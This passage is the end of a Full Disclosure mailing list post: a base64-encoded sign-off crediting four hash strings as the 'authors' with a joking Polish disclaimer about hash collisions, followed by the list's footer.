YXV0aG9ycyBvZiB0aGlzIGdlbSBhcmUqOgpjOGU3NGViZDgzOTJmZGE0Nzg4MTc5ZjlhMDJiYjQ5
MzM3NjM4ZTdiCmIxZjk4Nzg5Y2MwM2Q2YTBkYjJlOGJkMzA5ZjlmMjNiNmU1NDY5M2UKZmMzYzNm
NjM3NGFhNDQ0ZTc4Yzk0ZmQ0NjkyNWY5NGUxM2Y5YjU4NgoxMjBhZGNmOTczZTI4NGJmM2YzMjNl
NGVhMGFlZjlmNWQ5ZjNiZGU5CgoqIFphIGV3ZW50dWFsbmUga29saXpqZSBuaWUgb2Rwb3dpYWRh
bXkuCg==
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists